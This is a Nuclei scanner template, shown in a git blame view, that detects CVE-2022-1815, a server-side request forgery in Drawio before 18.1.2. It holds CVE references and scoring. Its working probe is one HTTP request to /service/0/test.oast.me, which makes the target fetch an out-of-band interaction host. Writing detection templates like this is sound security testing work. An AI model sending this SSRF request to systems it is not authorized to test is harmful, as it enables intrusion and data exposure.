nuclei-templates/http/cves/2022/CVE-2022-1815.yaml

41 lines
1.3 KiB
YAML
Raw Normal View History

2022-07-29 12:55:26 +00:00
id: CVE-2022-1815
info:
name: Drawio <18.1.2 - Server-Side Request Forgery
2022-07-29 12:55:26 +00:00
author: amit-jd
severity: high
2022-07-29 14:05:15 +00:00
description: |
Drawio before 18.1.2 is susceptible to server-side request forgery via the /service endpoint in jgraph/drawio. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
2022-07-29 12:55:26 +00:00
reference:
- https://huntr.dev/bounties/6e856a25-9117-47c6-9375-52f78876902f/
- https://huntr.dev/bounties/6e856a25-9117-47c6-9375-52f78876902f
- https://github.com/jgraph/drawio/commit/c287bef9101d024b1fd59d55ecd530f25000f9d8
- https://nvd.nist.gov/vuln/detail/CVE-2022-1815
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2022-1815
2023-07-11 19:49:27 +00:00
cwe-id: CWE-918,CWE-200
2023-08-31 11:46:18 +00:00
epss-score: 0.0087
cpe: cpe:2.3:a:diagrams:drawio:*:*:*:*:*:*:*:*
2023-08-31 11:46:18 +00:00
epss-percentile: 0.80286
2022-07-29 14:28:11 +00:00
metadata:
max-request: 1
2023-06-04 08:13:42 +00:00
verified: true
2023-07-11 19:49:27 +00:00
vendor: diagrams
product: drawio
tags: huntr,cve,cve2022,drawio,ssrf,oast,oss,jgraph
2022-07-29 12:55:26 +00:00
http:
2022-07-29 12:55:26 +00:00
- raw:
- |
2022-07-29 15:40:00 +00:00
GET /service/0/test.oast.me HTTP/2
2022-07-29 12:55:26 +00:00
Host: {{Hostname}}
matchers:
2022-07-29 15:40:00 +00:00
- type: dsl
dsl:
- "contains(body, 'Interactsh Server')"
- status_code == 200
condition: and